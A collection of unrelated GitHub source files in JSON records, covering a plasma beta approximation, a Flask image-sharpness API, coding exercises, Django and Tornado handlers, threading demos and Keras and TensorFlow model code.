beta_approximation(profiles_tensors, minor_radius, tri_u, tri_l, elongation, current, bt, beta_pol=False):\n \"\"\"\n To approximate beta! \n The factor of 2 at the front is to compensate the ions which are nowhere to be found in this analysis. \n The additional factor of 100 is to get it in percent form. \n \"\"\"\n e_c = 1.602e-19\n bpol = bpol_approx(minor_radius, tri_u, tri_l, elongation, current)\n if beta_pol: \n pressure_ped, _ = calculate_peped(profiles_tensors)\n beta_pol_approx = 2*mu_0*pressure_ped / (bpol*bpol)\n return beta_pol_approx \n density, temperature = profiles_tensors[:, 0, :], profiles_tensors[:, 1, :]\n pressure_prof = density*temperature\n pressure_average = pressure_prof.mean(-1)\n # TODO: This beta average is not really realistic I find... but am interested to see how it impacts\n return (100*2)*e_c*2*mu_0 * pressure_average / (bt*bt + bpol*bpol)\n\ndef pressure_calculation(profs: torch.Tensor, dataset=None, normalize=True): \n if normalize and dataset is not None: \n profs = dataset.denorm_profiles(profs.copy())\n return boltzmann_constant*torch.prod(profs, 1)\n\ndef calculate_physics_constraints(profiles_og, mps_og, train_set):\n # Denormalize everything! \n profiles = torch.clone(profiles_og)\n profiles = train_set.denorm_profiles(profiles, to_torch=True)\n mps = torch.clone(mps_og)\n mps = train_set.denorm_mps(mps, to_torch=True)\n sp = static_pressure_stored_energy_approximation(profiles)\n minor_radius, tri_u, tri_l, elongation, current, bt = mps[:, 2], mps[:, 4],mps[:, 5],mps[:, 6], mps[:, 8], mps[:, 9]\n bpol = bpol_approx(minor_radius, tri_u, tri_l, elongation, current)\n beta = beta_approximation(profiles, minor_radius, tri_u, tri_l, elongation, current, bt)\n pressure = pressure_calculation(profiles, normalize=False)\n\n return sp, beta, bpol, pressure\n","repo_name":"fusionby2030/psi_2022","sub_path":"src/common/physics_approximations.py","file_name":"physics_approximations.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7082144469","text":"import os\nimport cv2\nfrom PIL import Image\nimport time\nimport numpy as np\nimport pickle\nfrom flask import Flask\nimport pandas as pd\nimport jsonpickle\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n count = 1\n a = []\n #api endpoint of doucment data\n path = \"geeva22/Flask-api-for-document-quality-estimation/Aadhar/\" #C:\\Users\\Admin\\Downloads\\Work-idrbt\\crops\\Aadhar\n\n for file_name in os.listdir(path):\n if file_name.split(\".\")[-1].lower() in {\"jpeg\", \"jpg\", \"png\"}:\n img = cv2.imread(path + file_name)\n grey = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n lapla = cv2.Laplacian(grey, cv2.CV_64F).var()\n count += 1\n a.append(file_name)\n a.append(lapla)\n\n def Convert(a):\n it = iter(a)\n res_dct = dict(zip(it, it))\n return res_dct\n\n lst = a\n s = sorted(Convert(lst).items(), key=lambda x: x[1])\n m = s[-1][0]\n # print('Better quality image -',m)\n #end = time.perf_counter()\n # print('Execution time -',end-start)\n im = Image.open(path + m)\n out = np.array(im)\n lis = out.tolist()\n return jsonpickle.encode(lis)\n\nif __name__ ==\"__main__\":\n app.run(debug=True)\n","repo_name":"geeva22/Flask-api-for-document-quality-estimation","sub_path":"document_api.py","file_name":"document_api.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"19584080779","text":"\n# list1 = [\"Shogun\",\"Piatti\",\"Tapioca Express\",\"Burger King\",\"KFC\"]\n# list2 = [\"Piatti\",\"The Grill at Torrey Pines\",\"Hungry Hunter Steakhouse\",\"Shogun\"]\nlist1 = [\"happy\",\"sad\",\"good\"]\nlist2 = [\"sad\",\"happy\",\"good\"]\ndef findRestaurant(list1,list2):\n l1 = {j:i for i,j in enumerate(list1)}\n l2 = {j:i for i,j in enumerate(list2)}\n d={}\n for i in l1:\n if i in l2:\n \n val = l1[i]+l2[i]\n d[i]=val\n\n m = min(list(d.values()))\n res = []\n for key,val in d.items():\n if val <= m:\n m=val\n res.append(key)\n return res\n\nprint(findRestaurant(list1,list2))","repo_name":"Parikalp-Bhardwaj/Dsa-golang-python","sub_path":"Minimum_Index_Sum_of_Two_Lists/Minimum_Index_Sum_of_Two_Lists.py","file_name":"Minimum_Index_Sum_of_Two_Lists.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74931481101","text":"import math\nimport sys\n\ndef findMin(curr):\n it = 0\n while curr % 2 != 0:\n curr = curr // 2\n it += 1\n return it\n\nfor _ in range(int(input())):\n l = int(input())\n nums = list(map(int,input().split()))\n s = sum(nums)\n ans = sys.maxsize\n if s % 2 != 0:\n for num in nums:\n it = findMin(num)\n print(num,it)\n ans = min(it,ans) \n print(ans)\n else:\n print(0)\n # for num in nums:\n # if num % 2 == 0:\n # count_even += 1\n # even_min = min(num,even_min)\n # else:\n # cout_odd += 1\n # odd_min = min(num,odd_min)\n \n # if cout_odd % 2 == 0:\n # print(0)\n # else:\n # print(int(min(math.log(odd_min + 1,2),math.log(even_min,2))))\n","repo_name":"LibenHailu/interview-prep","sub_path":"practice/A_Divide_and_Conquer.py","file_name":"A_Divide_and_Conquer.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26172383133","text":"from tornado import web\nimport json, re\n\nclass Doc(web.RequestHandler):\n def initialize(self, data):\n self._documents = data\n\n def head(self):\n self.finish()\n\n def get(self):\n did = self.get_argument('id', None)\n dids = did or self.get_argument('ids', '')\n dq = self.get_argument('q', '')\n results = []\n for doc_id in dids.split(','):\n title, text = self._documents[int(doc_id)]\n result = {'doc_id': doc_id,\n 'title': title,\n 'url': self._get_url_from_title(title),\n 'snippet': self._get_snippet(text, dq)}\n results.append(result)\n self.finish(json.dumps({'results': results}))\n\n def _get_snippet(self, text, query):\n # MD - This is unnecessary\n lower_text = text.lower()\n lower_query = query.lower()\n emphasizable_terms = [pot for pot in lower_query.split() if pot in lower_text and len(pot) > 1]\n if len(emphasizable_terms) == 0: return '...'\n snippet_start_term = query if lower_query in lower_text else emphasizable_terms[0]\n term_start = lower_text.find(snippet_start_term)\n min_snippet_start = term_start - 200\n snippet_start = 0 if min_snippet_start <= 0 else lower_text.find(' ', min_snippet_start)\n max_snippet_end = term_start + len(snippet_start_term) + 200\n snippet_stop = len(text) if max_snippet_end >= len(text) else lower_text.rfind(' ', snippet_start, max_snippet_end) + 1\n snippet = text[snippet_start:snippet_stop]\n if len(emphasizable_terms) > 0:\n snippet = re.sub(r'(\\b' + r'\\b|\\b'.join([re.escape(t) for t in emphasizable_terms]) + r'\\b)', r'\\1', snippet, flags=re.IGNORECASE)\n if snippet_start > 0:\n snippet = '...' + snippet\n if snippet_stop < len(text):\n snippet = snippet + '...'\n return snippet\n\n def _get_url_from_title(self, title):\n return 'http://en.wikipedia.org/wiki/' + title.replace(' ', '_')\n\n","repo_name":"guolei329/SEA-Assignments","sub_path":"assignment2/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"14930633729","text":"import logging\nimport locale\nimport django\nimport os\n\nfrom settings import *\n\nlocale.setlocale(locale.LC_ALL, 'en_US.UTF-8')\n\nDATABASES = {\n\t'default': {\n\t\t'ENGINE': 'django.db.backends.mysql',\n\t\t'NAME': 'librarygadget',\n\t\t'USER': 'root',\n\t\t'PASSWORD': '',\n\t\t'HOST': '127.0.0.1',\n\t\t'PORT': ''\n\t}\n}\n\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': '127.0.0.1:11211',\n }\n}\n\nROOT_URLCONF = 'urls'\n\nlogging.basicConfig(\n level = logging.INFO, # logging.WARNING,\n format = '%(asctime)s %(levelname)s %(message)s',\n filename = os.path.join(SITE_ROOT, '/var/log/librarygadget/trace.log'),\n filemode = 'ab+',\n)\n\n\n","repo_name":"bluestemscott/librarygadget","sub_path":"librarygadget/settings_vagrant.py","file_name":"settings_vagrant.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"9854027985","text":"import pandas as pd \nfrom utility import hamming_scoreCV\n\n\n\nif __name__ == \"__main__\":\n data = pd.read_csv('subset_data/BH_bipirate.csv')\n\n Y = data[['Beach','Sunset','FallFoliage','Field','Mountain','Urban']]\n X = data.drop(columns= Y)\n\n score, clf, correct, incorrect = hamming_scoreCV(X, Y)","repo_name":"HiteshKhandelwal901/Feature_Selection_Algorithms_py","sub_path":"Black_Hole/subset_data/blackhole_run.py","file_name":"blackhole_run.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3433783544","text":"import os, shutil\n\n'''识别狗和猫的网络\n由于没有训练数据,所以只是搭建了网络结构'''\ndef init():\n '''用来移动图片'''\n #数据包被解压的路径\n original_dataset_dir = '/Users/chenyi/Documents/人工智能/all/train'\n #构造一个专门用于存储图片的路径\n base_dir = 'data/cats_and_dogs_small'\n os.makedirs(base_dir, exist_ok=True)\n #构造路径存储训练数据,校验数据以及测试数据\n train_dir = os.path.join(base_dir, 'train')\n os.makedirs(train_dir, exist_ok = True)\n test_dir = os.path.join(base_dir, 'test')\n os.makedirs(test_dir, exist_ok = True)\n validation_dir = os.path.join(base_dir, 'validation')\n os.makedirs(validation_dir, exist_ok = True)\n\n #构造专门存储猫图片的路径,用于训练网络\n train_cats_dir = os.path.join(train_dir, 'cats')\n os.makedirs(train_cats_dir, exist_ok = True)\n #构造存储狗图片路径,用于训练网络\n train_dogs_dir = os.path.join(train_dir, 'dogs')\n os.makedirs(train_dogs_dir, exist_ok = True)\n\n #构造存储猫图片的路径,用于校验网络\n validation_cats_dir = os.path.join(validation_dir, 'cats')\n os.makedirs(validation_cats_dir, exist_ok = True)\n #构造存储狗图片的路径,用于校验网络\n validation_dogs_dir = os.path.join(validation_dir, 'dogs')\n os.makedirs(validation_dogs_dir, exist_ok = True)\n\n #构造存储猫图片路径,用于测试网络\n test_cats_dir = os.path.join(test_dir, 'cats')\n os.makedirs(test_cats_dir, exist_ok = True)\n #构造存储狗图片路径,用于测试网络\n test_dogs_dir = os.path.join(test_dir, 'dogs')\n os.makedirs(test_dogs_dir, exist_ok = True)\n\n\n #把前1000张猫图片复制到训练路径\n fnames = ['cat.{}.jpg'.format(i) for i in range(1000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n #把接着的500张猫图片复制到校验路径\n fnames = ['cat.{}.jpg'.format(i) for i in range(1000, 1500)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n #把接着的500张猫图片复制到测试路径\n fnames = ['cat.{}.jpg'.format(i) for i in range(1500, 2000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_cats_dir, fname)\n shutil.copyfile(src, dst)\n\n #把1000张狗图片复制到训练路径\n fnames = ['dog.{}.jpg'.format(i) for i in range(1000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(train_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n #把接下500张狗图片复制到校验路径\n fnames = ['dog.{}.jpg'.format(i) for i in range(1000, 1500)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(validation_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n #把接下来500张狗图片复制到测试路径\n fnames = ['dog.{}.jpg'.format(i) for i in range(1500, 2000)]\n for fname in fnames:\n src = os.path.join(original_dataset_dir, fname)\n dst = os.path.join(test_dogs_dir, fname)\n shutil.copyfile(src, dst)\n\n print('total trainning cat images: ', len(os.listdir(train_cats_dir)))\n\n print('total training dog images', len(os.listdir(train_dogs_dir)))\n\n print('total validation cat images', len(os.listdir(validation_cats_dir)))\n\n print('total validation dogs images', len(os.listdir(validation_dogs_dir)))\n\n print('total test cat images:', len(os.listdir(test_cats_dir)))\n\n print('total test dog images:', len(os.listdir(test_dogs_dir)))\n\n\n'''搭建神经网络架构'''\nfrom keras import layers\nfrom keras import models\nfrom keras import optimizers\n\nmodel = models.Sequential()\n#输入图片大小是150*150 3表示图片像素用(R,G,B)表示\nmodel.add(layers.Conv2D(32, (3,3), activation='relu', input_shape=(150, 150, 3)))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(64, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(128, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Conv2D(128, (3,3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2,2)))\n\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\n\nmodel.compile(loss='binary_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),\n metrics=['acc'])\n\nmodel.summary()\n\n'''将数据读入内存'''\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./ 255) #把像素点的值除以255,使之在0到1之间\ntest_datagen = ImageDataGenerator(rescale = 1. / 255)\n\n#generator 实际上是将数据批量读入内存,使得代码能以for in 的方式去方便的访问\n# class_mode的作用,由于我们只有猫狗两种图片,因此该标签值不是0就是1\n# 由于train_dir路径下只有两个文件夹,它会为从这两个文件夹中读取的图片分别赋值0和1。\ntrain_generator = train_datagen.flow_from_directory(train_dir, target_size=(150, 150),\n batch_size=20,class_mode = 'binary')\nvalidation_generator = test_datagen.flow_from_directory(validation_dir,\n target_size = (150, 150),\n batch_size = 20,\n class_mode = 'binary')\n#calss_mode 让每张读入的图片对应一个标签值,我们上面一下子读入20张图片,因此还附带着一个数组(20, )\n#标签数组的具体值没有设定,由我们后面去使用\nfor data_batch, labels_batch in train_generator:\n print('data batch shape: ', data_batch.shape)\n print('labels batch shape: ', labels_batch.shape)\n break\n\n'''训练数据'''\n# 网络模型支持直接将generator作为参数输入,由于我们构造的generator一次批量读入20张图片\n# 总共有2000张图片,所以我们将参数steps_per_epoch = 100,\n# 这样每次训练时,模型会用for…in… 在train_generator上循环100次,将所有2000张图片全部读取,\n# 指定循环训练模型30次\nhistory = model.fit_generator(train_generator, steps_per_epoch = 100,\n epochs = 30, validation_data = validation_generator,\n validation_steps = 50)\n'''绘制型的训练准确率和校验准确率'''\nmodel.save('cats_and_dogs_small_1.h5')\nimport matplotlib.pyplot as plt\n\nacc = history.history['acc']\nval_acc = history.history['val_acc']\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\nepochs = range(1, len(acc) + 1)\n\n#绘制模型对训练数据和校验数据判断的准确率\nplt.plot(epochs, acc, 'bo', label = 'trainning acc')\nplt.plot(epochs, val_acc, 'b', label = 'validation acc')\nplt.title('Trainning and validation accuary')\nplt.legend()\n\nplt.show()\nplt.figure()\n\n#绘制模型对训练数据和校验数据判断的错误率\nplt.plot(epochs, loss, 'bo', label = 'Trainning loss')\nplt.plot(epochs, val_loss, 'b', label = 'Validation loss')\nplt.title('Trainning and validation loss')\nplt.legend()\n\nplt.show()\n\n'''为防止过度拟合,进行数据拓展'''\n# rotation_range表示对图片进行旋转变化, width_shift 和 height_shift对图片的宽和高进行拉伸,\n# shear_range指定裁剪变化的程度,zoom_range是对图片进行放大缩小,\n# horizaontal_flip将图片在水平方向上翻转,fill_mode表示当图片进行变换后产生多余空间时,如何去填充\ndatagen = ImageDataGenerator(rotation_range = 40, width_shift_range = 0.2, height_shift_range = 0.2,\n shear_range = 0.2, zoom_range = 0.2, horizontal_flip = True, fill_mode = 'nearest')","repo_name":"strawsyz/neural_network_study","sub_path":"catdognet.py","file_name":"catdognet.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21769331813","text":"from django.template import Context, loader\n\n\nclass WidgetBase(type):\n\tdef __new__(cls,name,bases,attrs):\n\t\tsuper_new = super(WidgetBase,cls).__new__\n\t\tparents = [b for b in bases if isinstance(b, WidgetBase)]\n\t\tif not parents:\n\t\t\treturn super_new(cls, name, bases, attrs)\n\t\tmodule = attrs.pop('__module__')\n\t\tnew_cls = super_new(cls,name,bases,{'__module__':module})\n\t\tfields = {}\n\t\tfor attr in attrs:\n\t\t\tfields[attr] = attrs[attr]\n\t\t\n\t\tsetattr(new_cls,'_fields',fields)\n\t\t\n\t\treturn new_cls\n\n\nclass Widget(object):\n\t__metaclass__ = WidgetBase\n\t\n\tclass Tpl:\n\t\tpass\n\t\n\tdef __init__(self,*args,**kwargs):\n\t\tname = self.__class__.__name__\n\t\t_widget = Widget.Tpl()\n\t\tfor field in self._fields:\n\t\t\tsetattr(_widget,field,self._fields[field])\n\t\tsetattr(_widget,'__name__',self.__class__.__name__)\n\t\tself.template = \"djazz/widgets/\"+_widget.__name__+\".html\"\n\t\tself._widget = _widget\n\t\n\tdef render(self):\n\t\tt = loader.get_template(self.template)\n\t\tc = Context({'widget' : self._widget })\n\t\treturn t.render(c)\n\t\t\n\nclass HelloWorld(Widget):\n\tname = \"HelloWorld Widget\"\n\tversion = \"0.1\"\n","repo_name":"fseries/djazz","sub_path":"core/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"8772123367","text":"import threading\r\nimport time\r\nimport random\r\n\r\nclass Cook(threading.Thread):\r\n def __init__(self, name, barrier):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n self.barrier = barrier\r\n\r\n def run(self):\r\n while True:\r\n print(f\"{self.name} sedang menyiapkan makanan\")\r\n time.sleep(random.randint(1,5))\r\n print(f\"{self.name} selesai menyiapkan makanan\")\r\n self.barrier.wait()\r\n\r\nclass Waiter(threading.Thread):\r\n def __init__(self, name, barrier):\r\n threading.Thread.__init__(self)\r\n self.name = name\r\n self.barrier = barrier\r\n\r\n def run(self):\r\n while True:\r\n print(f\"{self.name} sedang melayani pelanggan\")\r\n time.sleep(random.randint(1,5))\r\n print(f\"{self.name} selesai melayani pelanggan\")\r\n self.barrier.wait()\r\n\r\nclass Restaurant():\r\n def __init__(self, num_of_cooks, num_of_waiters):\r\n self.num_of_cooks = num_of_cooks\r\n self.num_of_waiters = num_of_waiters\r\n self.barrier = threading.Barrier(num_of_cooks + num_of_waiters)\r\n\r\n def start(self):\r\n cooks = []\r\n waiters = []\r\n for i in range(self.num_of_cooks):\r\n cook = Cook(f\"Koki-{i+1}\", self.barrier)\r\n cooks.append(cook)\r\n\r\n for i in range(self.num_of_waiters):\r\n waiter = Waiter(f\"Pelayan-{i+1}\", self.barrier)\r\n waiters.append(waiter)\r\n\r\n for cook in cooks:\r\n cook.start()\r\n\r\n for waiter in waiters:\r\n waiter.start()\r\n\r\n for i in range(3):\r\n print(\"Pelanggan datang\")\r\n time.sleep(random.randint(1,5))\r\n print(\"Pesanan diterima\")\r\n\r\n time.sleep(2)\r\n self.barrier.wait()\r\n print(\"Pesanan selesai\")\r\n\r\n for cook in cooks:\r\n cook.join()\r\n\r\n for waiter in waiters:\r\n waiter.join()\r\n\r\ndef main():\r\n num_of_cooks = 3\r\n num_of_waiters = 5\r\n restaurant = Restaurant(num_of_cooks, num_of_waiters)\r\n restaurant.start()\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"kerjabhakti/SISTER_3A","sub_path":"Chapter002/1204013_FauziahHenniHasibuan/Barrier.py","file_name":"Barrier.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"5416200485","text":"#-*-coding:utf-8 -*-\n\"\"\"\n@File: add_data.py\n@作用:这个文件用来模拟数据\n\"\"\"\n\n\nfrom .models import LongitudeLatitude, House, Underground\nfrom django.http import HttpResponse\nimport random\n\n# 添加经纬度信息\n\ndef add_LongitudeLatitude(request):\n for j in range(2):\n if j==0:\n for i in range(180):\n for z in range(1,10):\n LongitudeLatitude.objects.create(\n longitude=\"东经{}\".format(i),\n latitude=\"南纬{}\".format(z)\n )\n LongitudeLatitude.objects.create(\n longitude=\"东经{}\".format(i),\n latitude=\"北纬{}\".format(z)\n )\n if j == 1:\n for i in range(180):\n for z in range(1, 10):\n LongitudeLatitude.objects.create(\n longitude=\"西经{}\".format(i),\n latitude=\"南纬{}\".format(z)\n )\n LongitudeLatitude.objects.create(\n longitude=\"西经{}\".format(i),\n latitude=\"北纬{}\".format(z)\n )\n return HttpResponse(\"经纬度添加成功\")\n\n\n\n# 添加房屋信息\ndef add_house(request):\n lst = LongitudeLatitude.objects.values_list(\"id\", flat=True)\n house_list = [\"别墅\", \"平房\", \"瓦房\", \"窑洞\", \"楼房\"]\n for i in range(1,100000):\n house_name = random.choice(house_list)\n House.objects.create(\n housename=house_name+str(i),\n type=house_name,\n height=random.randint(10,50),\n area=random.randint(100,1000),\n longitudelatitude_id = random.choice(lst),\n )\n return HttpResponse(\"房屋添加成功!\")\n\n\n\n# 地下数据信息\ndef add_underground(request):\n lst = LongitudeLatitude.objects.values_list(\"id\", flat=True)\n for i in range(100000):\n Underground.objects.create(\n conduit = random.randint(10,100),\n collapse_height = random.randint(0,10),\n underground_height = random.randint(0,10),\n longitudelatitude_id = random.choice(lst)\n )\n return HttpResponse(\"地下信息添加成功!\")","repo_name":"liuhuanxg/image_generation","sub_path":"home/add_data.py","file_name":"add_data.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"23610491610","text":"import torch.nn as nn\nimport torch\n\nfrom .common import NoisyLinear\nfrom .utils import orthogonal_initialization\n\n\nclass QNetworkBaseMeta(type):\n \"\"\"\n Useful for making sure that classes with this metaclass\n perform certain functions after being initialized\n I.e registering noisy linear layers or doing specific\n initialization\n \"\"\"\n def __call__(cls, *args, **kw):\n instance = super().__call__(*args, **kw)\n instance.register_noisy_layers()\n print('registered noisy layers: ', instance.noisy_layers)\n instance.apply(orthogonal_initialization)\n print('done orthogonal initialization')\n return instance\n\n\nclass QNetworkBase(nn.Module, metaclass=QNetworkBaseMeta):\n def __init__(self):\n super().__init__()\n self.noisy_layers = None\n\n def sample_noise(self):\n \"\"\"\n Samples noise for registered NoisyLinear layers.\n The noisy layers do an internal check for self.training\n So will not sample noise if model is in eval mode\n \"\"\"\n if self.noisy_net:\n for module in self.noisy_layers:\n module.sample()\n\n def register_noisy_layers(self):\n \"\"\"\n Call at end of init by the metaclass, to register noisy linear layers\n This is to make sample_noise() more efficient so it doesn't have to\n check all modules.\n\n \"\"\"\n self.noisy_layers = []\n for module in self.modules():\n if isinstance(module, NoisyLinear):\n self.noisy_layers.append(module)\n elif isinstance(module, QNetworkBase) and module is not self:\n curr = type(self)\n mod = type(module)\n msg = f\"Current Class ({curr}) inherits from QNetworkBase \" + \\\n f\"but wraps module ({mod}) also inheriting from \" + \\\n \"QNetworkBase. Ensure only one class inherits from \" + \\\n \"QNB so NoisyLinear layers only get registered once\"\n raise TypeError(msg)\n","repo_name":"Hanwant/madigan","sub_path":"madigan/modelling/net/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"47"} +{"seq_id":"2594974299","text":"__author__ = 'Ksenia'\n\n\ndef linear_search(L, v):\n \"\"\"Linear search in the list of elements\n\n :param L: list of elements to search in\n :param v: object fot search\n :return: index of the first occurrence of v in L, or return if l is not in the list\n \"\"\"\n\n i = 0\n while i != len(L) and L[i] != v:\n i += 1\n if i == len(L):\n return -1\n else:\n return i\n\n\nif __name__ == '__main__':\n L = [1, 2, 3, 4, 5]\n v = 5\n print(linear_search(L, v))\n","repo_name":"kingdomfarfaraway/algorithms","sub_path":"linearsearch.py","file_name":"linearsearch.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"861627063","text":"from piston.resource import Resource as PistonResource\nfrom django.http import HttpResponseServerError, HttpResponseBadRequest\n\nfrom comrade.exceptions import (ComradeError, HttpResponseError, \n BadRequestError)\n\nimport commonware.log\nlogger = commonware.log.getLogger(__name__)\n\nclass Resource(PistonResource):\n def error_handler(self, error, request, method):\n if isinstance(error, ComradeError):\n logger.error(u'%s' % error)\n return _handle_comrade_exception(error)\n logger.exception(u'%s' % error)\n return super(Resource, self).error_handler(error, request, method)\n\nclass DebugResource(PistonResource):\n def error_handler(self, error, request, method):\n logger.exception(u'%s' % error)\n if 'text/html' in request.META.get('HTTP_ACCEPT', ''):\n raise\n elif isinstance(error, ComradeError):\n return _handle_comrade_exception(error)\n else:\n error.name = 'Unhandled exception'\n error.reason = str(error)\n return HttpResponseServerError(\n content=_json_error(error))\n\ndef _json_error(error):\n response = dict(name=error.name,\n reason=error.reason,\n success=False)\n return response\n\ndef _handle_comrade_exception(error):\n if isinstance(error, HttpResponseError):\n return HttpResponseServerError(\n content=_json_error(error))\n elif isinstance(error, BadRequestError):\n return HttpResponseBadRequest(\n content=_json_error(error))\n else:\n return HttpResponseServerError(\n content=_json_error(error))\n","repo_name":"bueda/django-comrade","sub_path":"comrade/piston/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"17074838102","text":"import pandas as pd\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.utils.multiclass import unique_labels\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\n\r\ndef get_model(backbone, top_model, input_shape=(224, 224, 3), output_shape=4, optimizer_name='SGD', learning_rate=0.01,\r\n n_epochs=20):\r\n\r\n # Set backbone\r\n if backbone == 'vgg19':\r\n base_model = tf.keras.applications.VGG19(weights='imagenet', include_top=False, input_shape=input_shape)\r\n elif backbone == 'resnet':\r\n base_model = tf.keras.applications.ResNet50(weights='imagenet', include_top=False, input_shape=input_shape)\r\n elif backbone == 'fsconv':\r\n base_model = tf.keras.Sequential()\r\n base_model.add(tf.keras.layers.Conv2D(32, (3, 3), activation='relu', input_shape=input_shape, padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n base_model.add(tf.keras.layers.Conv2D(128, (3, 3), activation='relu', padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n base_model.add(tf.keras.layers.Conv2D(512, (3, 3), activation='relu', padding=\"same\"))\r\n base_model.add(tf.keras.layers.MaxPooling2D(pool_size=(2, 2)))\r\n\r\n # Set top model\r\n x = base_model.layers[-1].output\r\n if 'GAP' in top_model:\r\n x = tf.keras.layers.GlobalAveragePooling2D()(x)\r\n if 'GMP' in top_model:\r\n x = tf.keras.layers.GlobalMaxPooling2D()(x)\r\n x = tf.keras.layers.Dense(output_shape, activation='softmax', name='predictions')(x)\r\n\r\n # Join base and top model\r\n model = tf.keras.Model(base_model.input, x)\r\n\r\n # Set optimizer and learning rate\r\n if 'SGD' in optimizer_name:\r\n if 'decay' in optimizer_name:\r\n optimizer = tf.keras.optimizers.SGD(learning_rate, decay=learning_rate / n_epochs)\r\n else:\r\n optimizer = tf.keras.optimizers.SGD(learning_rate)\r\n elif 'Adam' in optimizer_name:\r\n optimizer = tf.keras.optimizers.Adam(learning_rate)\r\n elif 'Adagrad' in optimizer_name:\r\n optimizer = tf.keras.optimizers.Adagrad(lr=learning_rate, decay=learning_rate / n_epochs)\r\n else:\r\n print('Non-valid optimizer... using SGD')\r\n optimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n # Compile\r\n model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\r\n print(model.summary())\r\n\r\n return model\r\n\r\n\r\ndef evaluate(refs, preds, generator, history, dir_results, labels):\r\n\r\n # Make plots for learning-curve\r\n learning_curve_plot(history, dir_results, 'lc')\r\n\r\n # Obtain confusion matrix (no normalized)\r\n ax = plot_confusion_matrix(refs, preds, np.array(labels))\r\n ax.figure.savefig(dir_results + '/cm')\r\n plt.close()\r\n\r\n\r\ndef learning_curve_plot(history, dir_out, name_out):\r\n\r\n plt.figure()\r\n plt.subplot(211)\r\n plt.plot(history.history['accuracy'])\r\n plt.plot(history.history['val_accuracy'])\r\n plt.axis([0, history.epoch[-1], 0, 1])\r\n plt.legend(['acc', 'val_acc'], loc='upper right')\r\n plt.title('learning-curve')\r\n plt.ylabel('accuracy')\r\n plt.subplot(212)\r\n plt.plot(history.history['loss'])\r\n plt.plot(history.history['val_loss'])\r\n plt.axis([0, history.epoch[-1], 0, max(history.history['loss'] + history.history['val_loss'])])\r\n plt.legend(['loss', 'val_loss'], loc='upper right')\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.savefig(dir_out + '/' + name_out)\r\n plt.close()\r\n\r\n\r\ndef plot_confusion_matrix(y_true, y_pred, classes, normalize=False, title=None, cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n 